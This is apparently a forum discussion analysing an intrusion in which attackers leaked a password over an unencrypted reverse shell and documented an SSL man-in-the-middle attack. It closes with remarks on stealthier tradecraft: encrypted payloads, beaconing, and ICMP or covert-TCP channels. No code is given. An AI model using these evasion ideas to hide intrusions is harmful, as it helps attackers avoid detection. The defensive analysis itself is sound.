[isthrowaway]

The traffic containing the clear text password was not scp, it was the reverse shell they sent themselves. Reverse shells are unencrypted on the wire, and when scp prompted for the password, they typed it in over their reverse shell. A significant oversight on their part. If it was a team, it must have been a less experienced member who made that mistake.

As far as the SSL MITM goes, they indeed documented their attack with various files containing notes in English. They had a separate directory (within the target's folder) containing the certificates they were using in the attack.

[kaivi]

Can't help but imagine your www-data which spawned nc, and it seems too amateurish for a high profile hacker group. Makes it seem as if they've copy-pasted the first one-liner reverse shell found on Google. Even the Metasploit framework has introduced payloads a while ago which do traffic encryption/obfuscation. Much more subtle reverse shells are used in the wild, where a compromised machine reaches out to hacker's server once in a while and receives commands and dumps output, even over something like ICMP/Loki or Covert TCP.